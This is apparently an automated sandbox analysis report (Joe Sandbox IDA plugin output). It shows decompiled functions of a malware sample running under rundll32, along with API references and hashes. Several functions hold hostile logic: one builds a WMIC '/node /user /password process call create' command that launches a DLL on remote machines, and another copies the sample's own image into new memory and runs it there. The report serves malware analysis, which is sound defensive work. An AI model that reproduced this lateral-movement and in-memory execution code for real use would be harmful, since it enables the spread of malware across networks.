                                                                                                          0x04a44ec0
                                                                                                          0x04a44ec0
                                                                                                          0x04a44ec3
                                                                                                          0x04a44ec4
                                                                                                          0x04a44ec6
                                                                                                          0x04a44ec8
                                                                                                          0x04a44ec9
                                                                                                          0x04a44ecb
                                                                                                          0x04a44ecc
                                                                                                          0x04a44ecc
                                                                                                          0x04a44ef0
                                                                                                          0x04a44ef2
                                                                                                          0x04a44ef6
                                                                                                          0x04a44f12
                                                                                                          0x04a44f14
                                                                                                          0x04a44f21
                                                                                                          0x04a44f23
                                                                                                          0x04a44f23
                                                                                                          0x04a44f2d
                                                                                                          0x04a44f2d
                                                                                                          0x04a44f12
                                                                                                          0x04a44f35
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04A44E76
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A44E79
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A44F2A
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A44F2D
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04A44F32
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A44F35
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Free$Alloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 3689955550-0
                                                                                                          • Opcode ID: f571f839b84828fcfb07dac601e24eb8726647f91b40c1ed98b9c15d45354bd5
                                                                                                          • Instruction ID: e58d85fef9eb418101a5acf101bfe7a23b416a062d3eea93aad2067bae3ed19d
                                                                                                          • Opcode Fuzzy Hash: f571f839b84828fcfb07dac601e24eb8726647f91b40c1ed98b9c15d45354bd5
                                                                                                          • Instruction Fuzzy Hash: E22136316842447AEF219F648805FEF7F78EFE9705F008448F5499B2D0DA75A909C760
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4641A(char* _a4) {
                                                                                                          				int _v8;
                                                                                                          				short* _v12;
                                                                                                          				int _t7;
                                                                                                          				short* _t11;
                                                                                                          				int _t12;
                                                                                                          				short* _t13;
                                                                                                          
                                                                                                          				_t7 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, 0, 0);
                                                                                                          				_v8 = _t7;
                                                                                                          				if(_t7 == 0) {
                                                                                                          					L3:
                                                                                                          					return 0;
                                                                                                          				}
                                                                                                          				_t11 = HeapAlloc(GetProcessHeap(), 0, _t7 + _t7);
                                                                                                          				_v12 = _t11;
                                                                                                          				if(_t11 == 0) {
                                                                                                          					goto L3;
                                                                                                          				}
                                                                                                          				_t12 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, _t11, _v8);
                                                                                                          				_t13 = _v12;
                                                                                                          				if(_t12 == 0) {
                                                                                                          					goto L3;
                                                                                                          				}
                                                                                                          				return _t13;
                                                                                                          			}









                                                                                                          0x04a46439
                                                                                                          0x04a4643b
                                                                                                          0x04a46440
                                                                                                          0x04a4646e
                                                                                                          0x00000000
                                                                                                          0x04a4646e
                                                                                                          0x04a4644d
                                                                                                          0x04a46453
                                                                                                          0x04a46458
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a46465
                                                                                                          0x04a46469
                                                                                                          0x04a4646c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a46474

                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04A48E53,000000FF,00000000,00000000,00000000,00000000,77454AB0,?,04A48E53,00000000), ref: 04A46439
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,04A48E53,00000000), ref: 04A46446
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,04A48E53,00000000), ref: 04A4644D
                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04A48E53,000000FF,00000000,00000000,?,04A48E53,00000000), ref: 04A46465
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 1432973188-636472023
                                                                                                          • Opcode ID: 8fb5c7399a53e4df4877f3335844b30d03696b93c80083db70e1b1c131e55133
                                                                                                          • Instruction ID: 0a94f9d279c86998a280d520929e8cdaddd8de9c6cb8c7e5588ff4f5b085ae00
                                                                                                          • Opcode Fuzzy Hash: 8fb5c7399a53e4df4877f3335844b30d03696b93c80083db70e1b1c131e55133
                                                                                                          • Instruction Fuzzy Hash: A2F06DB6A05118BFAF006FA89DC4C7F7AACEBC52A47100636F911E2280D2389D0156A0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A46CED(signed int _a4, intOrPtr _a8) {
                                                                                                          				void* __ebx;
                                                                                                          				signed int* _t11;
                                                                                                          				void* _t13;
                                                                                                          
                                                                                                          				_t11 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                          				if(_t11 != 0) {
                                                                                                          					 *_t11 =  *_t11 & 0x00000000;
                                                                                                          					_t11[1] = _a4;
                                                                                                          					if(E04A46D35(_t11, _t13, _a8) == 0) {
                                                                                                          						_t11 = 0;
                                                                                                          						HeapFree(GetProcessHeap(), 0, 0);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t11;
                                                                                                          			}






                                                                                                          0x04a46d05
                                                                                                          0x04a46d09
                                                                                                          0x04a46d11
                                                                                                          0x04a46d14
                                                                                                          0x04a46d1e
                                                                                                          0x04a46d21
                                                                                                          0x04a46d27
                                                                                                          0x04a46d27
                                                                                                          0x04a46d1e
                                                                                                          0x04a46d32

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008,00000000,74714F20,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46CFC
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46CFF
                                                                                                            • Part of subcall function 04A46D35: EnterCriticalSection.KERNEL32(?,74714F20,?,04A46D1C,?,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46D46
                                                                                                            • Part of subcall function 04A46D35: LeaveCriticalSection.KERNEL32(?,?,04A46D1C,?,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46D7F
                                                                                                            • Part of subcall function 04A46D35: Sleep.KERNELBASE(00002710,?,04A46D1C,?,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46D97
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46D24
                                                                                                          • HeapFree.KERNEL32(00000000,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46D27
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
                                                                                                          • String ID: Uqt0Xqt
                                                                                                          • API String ID: 2739146912-3529349503
                                                                                                          • Opcode ID: db6d5244cd8e3ddf0d83c2905993e5518908928e86c7ede510c98936f1056e89
                                                                                                          • Instruction ID: bfeab0637fa6aa29cbdb44bae64cc7ed60acf53a595ec453518a86d0f5ed789d
                                                                                                          • Opcode Fuzzy Hash: db6d5244cd8e3ddf0d83c2905993e5518908928e86c7ede510c98936f1056e89
                                                                                                          • Instruction Fuzzy Hash: C1E065722007096BEB106FE99CC4F1FBB9CFBD5314F008426F9008A140CA79E8058720
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 98%
                                                                                                          			E04A49972(WCHAR* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                                                          				short _v8;
                                                                                                          				short _v10;
                                                                                                          				short _v12;
                                                                                                          				short _v14;
                                                                                                          				short _v16;
                                                                                                          				short _v18;
                                                                                                          				short _v20;
                                                                                                          				short _v22;
                                                                                                          				short _v24;
                                                                                                          				short _v26;
                                                                                                          				short _v28;
                                                                                                          				short _v30;
                                                                                                          				short _v32;
                                                                                                          				short _v34;
                                                                                                          				short _v36;
                                                                                                          				short _v38;
                                                                                                          				short _v40;
                                                                                                          				short _v42;
                                                                                                          				short _v44;
                                                                                                          				short _v46;
                                                                                                          				short _v48;
                                                                                                          				short _v50;
                                                                                                          				short _v52;
                                                                                                          				short _v54;
                                                                                                          				short _v56;
                                                                                                          				short _v58;
                                                                                                          				short _v60;
                                                                                                          				short _v62;
                                                                                                          				short _v64;
                                                                                                          				short _v66;
                                                                                                          				short _v68;
                                                                                                          				short _v70;
                                                                                                          				short _v72;
                                                                                                          				short _v74;
                                                                                                          				short _v76;
                                                                                                          				short _v78;
                                                                                                          				short _v80;
                                                                                                          				short _v82;
                                                                                                          				short _v84;
                                                                                                          				short _v86;
                                                                                                          				short _v88;
                                                                                                          				short _v608;
                                                                                                          				char _v1128;
                                                                                                          				char _v17512;
                                                                                                          				short _t72;
                                                                                                          				short _t73;
                                                                                                          				short _t74;
                                                                                                          				short _t75;
                                                                                                          				short _t76;
                                                                                                          				short _t77;
                                                                                                          				short _t79;
                                                                                                          				short _t81;
                                                                                                          				short _t82;
                                                                                                          				signed int _t86;
                                                                                                          				short _t91;
                                                                                                          				WCHAR* _t96;
                                                                                                          				short _t97;
                                                                                                          				void* _t98;
                                                                                                          				void _t99;
                                                                                                          				signed int _t100;
                                                                                                          				signed short* _t104;
                                                                                                          				short _t107;
                                                                                                          				signed int _t108;
                                                                                                          				short _t109;
                                                                                                          				void* _t112;
                                                                                                          				short _t119;
                                                                                                          				short _t120;
                                                                                                          				short _t121;
                                                                                                          				short _t123;
                                                                                                          				short _t124;
                                                                                                          				short _t125;
                                                                                                          				short _t127;
                                                                                                          				short _t131;
                                                                                                          				short _t132;
                                                                                                          				short _t133;
                                                                                                          				short _t134;
                                                                                                          				short _t135;
                                                                                                          				short _t137;
                                                                                                          				short _t138;
                                                                                                          				short _t139;
                                                                                                          				short _t140;
                                                                                                          				short _t142;
                                                                                                          				signed int _t145;
                                                                                                          				void* _t146;
                                                                                                          
                                                                                                          				_t96 = __ebx;
                                                                                                          				E04A4A760(0x4464);
                                                                                                          				 *__ebx = 0;
                                                                                                          				E04A488D3( &_v1128);
                                                                                                          				_t72 = 0x2f;
                                                                                                          				_v88 = _t72;
                                                                                                          				_t73 = 0x6e;
                                                                                                          				_v86 = _t73;
                                                                                                          				_t74 = 0x6f;
                                                                                                          				_v84 = _t74;
                                                                                                          				_t75 = 0x64;
                                                                                                          				_v82 = _t75;
                                                                                                          				_t76 = 0x65;
                                                                                                          				_v80 = _t76;
                                                                                                          				_t77 = 0x3a;
                                                                                                          				_t97 = 0x22;
                                                                                                          				_v78 = _t77;
                                                                                                          				_v76 = _t97;
                                                                                                          				_t79 = 0x25;
                                                                                                          				_t107 = 0x77;
                                                                                                          				_v74 = _t79;
                                                                                                          				_v72 = _t107;
                                                                                                          				_t81 = 0x73;
                                                                                                          				_v70 = _t81;
                                                                                                          				_v68 = _t97;
                                                                                                          				_t119 = 0x20;
                                                                                                          				_v66 = _t119;
                                                                                                          				_t120 = 0x2f;
                                                                                                          				_v64 = _t120;
                                                                                                          				_t121 = 0x75;
                                                                                                          				_v62 = _t121;
                                                                                                          				_v60 = _t81;
                                                                                                          				_t123 = 0x65;
                                                                                                          				_v58 = _t123;
                                                                                                          				_t124 = 0x72;
                                                                                                          				_v56 = _t124;
                                                                                                          				_t125 = 0x3a;
                                                                                                          				_v54 = _t125;
                                                                                                          				_v52 = _t97;
                                                                                                          				_t127 = 0x25;
                                                                                                          				_v50 = _t127;
                                                                                                          				_v48 = _t107;
                                                                                                          				_v46 = _t81;
                                                                                                          				_v44 = _t97;
                                                                                                          				_t131 = 0x20;
                                                                                                          				_v42 = _t131;
                                                                                                          				_t132 = 0x2f;
                                                                                                          				_v40 = _t132;
                                                                                                          				_t133 = 0x70;
                                                                                                          				_v38 = _t133;
                                                                                                          				_t134 = 0x61;
                                                                                                          				_v36 = _t134;
                                                                                                          				_t135 = _t81;
                                                                                                          				_v34 = _t135;
                                                                                                          				_v32 = _t135;
                                                                                                          				_v30 = _t107;
                                                                                                          				_t137 = 0x6f;
                                                                                                          				_v28 = _t137;
                                                                                                          				_t138 = 0x72;
                                                                                                          				_v26 = _t138;
                                                                                                          				_t139 = 0x64;
                                                                                                          				_v24 = _t139;
                                                                                                          				_t140 = 0x3a;
                                                                                                          				_v22 = _t140;
                                                                                                          				_v20 = _t97;
                                                                                                          				_t142 = 0x25;
                                                                                                          				_v14 = _t81;
                                                                                                          				_t82 = 0x20;
                                                                                                          				_v10 = _t82;
                                                                                                          				_v8 = 0;
                                                                                                          				_v18 = _t142;
                                                                                                          				_v16 = _t107;
                                                                                                          				_v12 = _t97;
                                                                                                          				_a12 = wsprintfW(__ebx,  &_v88, _a4, _a8, _a12);
                                                                                                          				_t98 = 0;
                                                                                                          				do {
                                                                                                          					_t48 = _t98 + L"process call create \"C:\\Windows\\System32\\rundll32.exe"; // 0x720070
                                                                                                          					_t108 =  *_t48 & 0x0000ffff;
                                                                                                          					 *(_t146 + _t98 - 0x25c) = _t108;
                                                                                                          					_t98 = _t98 + 2;
                                                                                                          				} while (_t108 != 0);
                                                                                                          				_t112 =  &_v608 - 2;
                                                                                                          				do {
                                                                                                          					_t99 =  *(_t112 + 2);
                                                                                                          					_t112 = _t112 + 2;
                                                                                                          				} while (_t99 != 0);
                                                                                                          				_t100 = 0xb;
                                                                                                          				_t86 = memcpy(_t112, L" \\\"C:\\Windows\\%s\\\" #1 ", _t100 << 2);
                                                                                                          				asm("movsw");
                                                                                                          				_t145 = _a12 + wsprintfW( &(__ebx[_t86]),  &_v608,  &_v1128);
                                                                                                          				E04A46735( &_v17512, 0x1fff);
                                                                                                          				_t104 =  &_v17512;
                                                                                                          				while(1) {
                                                                                                          					_t91 =  *_t104 & 0x0000ffff;
                                                                                                          					if(_t91 == 0x22) {
                                                                                                          						_t109 = 0x5c;
                                                                                                          						_t96[_t145] = _t109;
                                                                                                          						_t145 = _t145 + 1;
                                                                                                          					}
                                                                                                          					_t96[_t145] = _t91;
                                                                                                          					if(_t91 == 0) {
                                                                                                          						break;
                                                                                                          					}
                                                                                                          					_t104 =  &(_t104[1]);
                                                                                                          					_t145 = _t145 + 1;
                                                                                                          				}
                                                                                                          				wsprintfW( &(_t96[_t145]), "\"");
                                                                                                          				return 1;
                                                                                                          			}























































































                                                                                                          0x04a49972
                                                                                                          0x04a4997a
                                                                                                          0x04a49982
                                                                                                          0x04a4998d
                                                                                                          0x04a49994
                                                                                                          0x04a49997
                                                                                                          0x04a4999b
                                                                                                          0x04a4999e
                                                                                                          0x04a499a2
                                                                                                          0x04a499a5
                                                                                                          0x04a499a9
                                                                                                          0x04a499ac
                                                                                                          0x04a499b0
                                                                                                          0x04a499b3
                                                                                                          0x04a499b7
                                                                                                          0x04a499ba
                                                                                                          0x04a499bd
                                                                                                          0x04a499c3
                                                                                                          0x04a499c7
                                                                                                          0x04a499ca
                                                                                                          0x04a499cd
                                                                                                          0x04a499d3
                                                                                                          0x04a499d7
                                                                                                          0x04a499dc
                                                                                                          0x04a499e2
                                                                                                          0x04a499e6
                                                                                                          0x04a499e9
                                                                                                          0x04a499ed
                                                                                                          0x04a499f0
                                                                                                          0x04a499f4
                                                                                                          0x04a499f5
                                                                                                          0x04a499fd
                                                                                                          0x04a49a01
                                                                                                          0x04a49a04
                                                                                                          0x04a49a08
                                                                                                          0x04a49a09
                                                                                                          0x04a49a0f
                                                                                                          0x04a49a10
                                                                                                          0x04a49a18
                                                                                                          0x04a49a1c
                                                                                                          0x04a49a1d
                                                                                                          0x04a49a23
                                                                                                          0x04a49a29
                                                                                                          0x04a49a31
                                                                                                          0x04a49a35
                                                                                                          0x04a49a38
                                                                                                          0x04a49a3c
                                                                                                          0x04a49a3d
                                                                                                          0x04a49a43
                                                                                                          0x04a49a46
                                                                                                          0x04a49a4a
                                                                                                          0x04a49a4d
                                                                                                          0x04a49a51
                                                                                                          0x04a49a53
                                                                                                          0x04a49a57
                                                                                                          0x04a49a5d
                                                                                                          0x04a49a61
                                                                                                          0x04a49a64
                                                                                                          0x04a49a68
                                                                                                          0x04a49a6b
                                                                                                          0x04a49a6f
                                                                                                          0x04a49a72
                                                                                                          0x04a49a76
                                                                                                          0x04a49a79
                                                                                                          0x04a49a7f
                                                                                                          0x04a49a83
                                                                                                          0x04a49a86
                                                                                                          0x04a49a8a
                                                                                                          0x04a49a8e
                                                                                                          0x04a49a9a
                                                                                                          0x04a49aa3
                                                                                                          0x04a49aa7
                                                                                                          0x04a49aab
                                                                                                          0x04a49ab8
                                                                                                          0x04a49abb
                                                                                                          0x04a49abd
                                                                                                          0x04a49abd
                                                                                                          0x04a49abd
                                                                                                          0x04a49ac4
                                                                                                          0x04a49acc
                                                                                                          0x04a49acf
                                                                                                          0x04a49ada
                                                                                                          0x04a49add
                                                                                                          0x04a49add
                                                                                                          0x04a49ae1
                                                                                                          0x04a49ae4
                                                                                                          0x04a49aeb
                                                                                                          0x04a49af1
                                                                                                          0x04a49b04
                                                                                                          0x04a49b15
                                                                                                          0x04a49b23
                                                                                                          0x04a49b28
                                                                                                          0x04a49b2e
                                                                                                          0x04a49b2e
                                                                                                          0x04a49b34
                                                                                                          0x04a49b38
                                                                                                          0x04a49b39
                                                                                                          0x04a49b3d
                                                                                                          0x04a49b3d
                                                                                                          0x04a49b3e
                                                                                                          0x04a49b45
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a49b47
                                                                                                          0x04a49b4a
                                                                                                          0x04a49b4a
                                                                                                          0x04a49b56
                                                                                                          0x04a49b60

                                                                                                          APIs
                                                                                                            • Part of subcall function 04A488D3: PathFindFileNameW.SHLWAPI(04A57BC8,775EC0B0,?,04A495B2), ref: 04A488E3
                                                                                                          • wsprintfW.USER32 ref: 04A49AAF
                                                                                                          • wsprintfW.USER32 ref: 04A49B0D
                                                                                                          • wsprintfW.USER32 ref: 04A49B56
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wsprintf$FileFindNamePath
                                                                                                          • String ID: \"C:\Windows\%s\" #1
                                                                                                          • API String ID: 988121887-1875761687
                                                                                                          • Opcode ID: 3eb0a6337c98311e0baef0abcc41fb371e59a97c182c7bec9ad9867704dc7289
                                                                                                          • Instruction ID: 05aa910bbe1a7334340394b9a9494a1bf1ad6334031c04633caae9beb788eda7
                                                                                                          • Opcode Fuzzy Hash: 3eb0a6337c98311e0baef0abcc41fb371e59a97c182c7bec9ad9867704dc7289
                                                                                                          • Instruction Fuzzy Hash: 50517623E24358A5EB20DFD4EC05BEFB775FF447A0F10606AE604AB2A0F2B15941C799
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 58%
                                                                                                          			E04A46F7C(void* __ecx, intOrPtr _a4) {
                                                                                                          				signed int _v8;
                                                                                                          				_Unknown_base(*)()* _t7;
                                                                                                          
                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                          				_t7 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "IsWow64Process");
                                                                                                          				if(_t7 != 0) {
                                                                                                          					 *_t7(_a4,  &_v8);
                                                                                                          				}
                                                                                                          				return _v8;
                                                                                                          			}





                                                                                                          0x04a46f80
                                                                                                          0x04a46f95
                                                                                                          0x04a46f9d
                                                                                                          0x04a46fa6
                                                                                                          0x04a46fa6
                                                                                                          0x04a46fac

                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04A47170,00000000,?,04A47AF8), ref: 04A46F8E
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 04A46F95
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                          • API String ID: 1646373207-3024904723
                                                                                                          • Opcode ID: abb3ff3f5a63c9b563d304136787542559b46e1fd688c25c6322b49a2dff5dd0
                                                                                                          • Instruction ID: c3f793acf969aae4d536cf5f4505ab28b3ddd9dd53c3bfd6a1e25c6a9bda3801
                                                                                                          • Opcode Fuzzy Hash: abb3ff3f5a63c9b563d304136787542559b46e1fd688c25c6322b49a2dff5dd0
                                                                                                          • Instruction Fuzzy Hash: 9DD01275640209BBDB11DB94DD0AFAD7768EB95749F504014B906D1050D7B9EF02DB24
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 84%
                                                                                                          			E04A4923F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                          				long _v8;
                                                                                                          				long _v12;
                                                                                                          				void* __esi;
                                                                                                          				void* _t14;
                                                                                                          				void* _t19;
                                                                                                          				void* _t22;
                                                                                                          				void* _t31;
                                                                                                          				long _t35;
                                                                                                          				void* _t40;
                                                                                                          				intOrPtr _t42;
                                                                                                          				int _t44;
                                                                                                          				void* _t47;
                                                                                                          				long _t48;
                                                                                                          				intOrPtr _t52;
                                                                                                          
                                                                                                          				_push(__ecx);
                                                                                                          				_push(__ecx);
                                                                                                          				if( *0x4a57b8c != 0) {
                                                                                                          					L15:
                                                                                                          					return 0;
                                                                                                          				}
                                                                                                          				_t52 =  *0x4a53984; // 0x32e55b8
                                                                                                          				if(_t52 == 0) {
                                                                                                          					goto L15;
                                                                                                          				}
                                                                                                          				_t14 =  *0x4a57b98;
                                                                                                          				_t44 =  *( *((intOrPtr*)(_t14 + 0x3c)) + _t14 + 0x50);
                                                                                                          				_t40 = _t14;
                                                                                                          				_v8 = _t44;
                                                                                                          				_t31 = VirtualAlloc(0, _t44, 0x1000, 4);
                                                                                                          				if(_t31 == 0) {
                                                                                                          					L14:
                                                                                                          					goto L15;
                                                                                                          				}
                                                                                                          				 *0x4a57bb4 = _t31;
                                                                                                          				memcpy(_t31, _t40, _t44);
                                                                                                          				_t42 =  *0x4a53984; // 0x32e55b8
                                                                                                          				_t5 = _t42 + 0x3c; // 0xe8
                                                                                                          				_t47 =  *_t5 + _t42;
                                                                                                          				if(_t47 != 0) {
                                                                                                          					_t21 =  *((intOrPtr*)(_t47 + 0xa0));
                                                                                                          					if( *((intOrPtr*)(_t47 + 0xa0)) != 0 &&  *((intOrPtr*)(_t47 + 0xa4)) != 0) {
                                                                                                          						_t22 = E04A48FD1(_t47, _t21);
                                                                                                          						_t23 = _t22 + _t42;
                                                                                                          						if(_t22 + _t42 != 0 && E04A48EA9(_t23, _t31) != 0 && E04A48F35(_t47, _t31) != 0) {
                                                                                                          							_push(0xffffffff);
                                                                                                          							_push(_a12);
                                                                                                          							_push(_a8);
                                                                                                          							_push(_a4);
                                                                                                          							 *((intOrPtr*)(E04A49154 -  *0x4a57b98 + _t31))();
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t48 = _v8;
                                                                                                          				if(VirtualProtect(_t31, _t48, 4,  &_v12) == 0) {
                                                                                                          					goto L14;
                                                                                                          				}
                                                                                                          				_t35 = _t48;
                                                                                                          				_t19 = _t31;
                                                                                                          				if(_t48 == 0) {
                                                                                                          					L13:
                                                                                                          					VirtualFree(_t31, _t48, 0x4000);
                                                                                                          					goto L14;
                                                                                                          				} else {
                                                                                                          					goto L12;
                                                                                                          				}
                                                                                                          				do {
                                                                                                          					L12:
                                                                                                          					 *_t19 = 0;
                                                                                                          					_t19 = _t19 + 1;
                                                                                                          					_t35 = _t35 - 1;
                                                                                                          				} while (_t35 != 0);
                                                                                                          				goto L13;
                                                                                                          			}

















                                                                                                          0x04a49242
                                                                                                          0x04a49243
                                                                                                          0x04a4924c
                                                                                                          0x04a4932c
                                                                                                          0x04a4932f
                                                                                                          0x04a4932f
                                                                                                          0x04a49252
                                                                                                          0x04a49258
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4925e
                                                                                                          0x04a49268
                                                                                                          0x04a49276
                                                                                                          0x04a49278
                                                                                                          0x04a49281
                                                                                                          0x04a49285
                                                                                                          0x04a49329
                                                                                                          0x00000000
                                                                                                          0x04a4932b
                                                                                                          0x04a4928e
                                                                                                          0x04a49294
                                                                                                          0x04a49299
                                                                                                          0x04a4929f
                                                                                                          0x04a492a5
                                                                                                          0x04a492a7
                                                                                                          0x04a492a9
                                                                                                          0x04a492b1
                                                                                                          0x04a492bf
                                                                                                          0x04a492c4
                                                                                                          0x04a492c6
                                                                                                          0x04a492de
                                                                                                          0x04a492e0
                                                                                                          0x04a492e8
                                                                                                          0x04a492f1
                                                                                                          0x04a492f6
                                                                                                          0x04a492f6
                                                                                                          0x04a492c6
                                                                                                          0x04a492b1
                                                                                                          0x04a492f8
                                                                                                          0x04a4930b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4930d
                                                                                                          0x04a4930f
                                                                                                          0x04a49313
                                                                                                          0x04a4931c
                                                                                                          0x04a49323
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a49315
                                                                                                          0x04a49315
                                                                                                          0x04a49315
                                                                                                          0x04a49318
                                                                                                          0x04a49319
                                                                                                          0x04a49319
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,04A479FC,?,?,?), ref: 04A4927B
                                                                                                          • memcpy.MSVCRT ref: 04A49294
                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04A49303
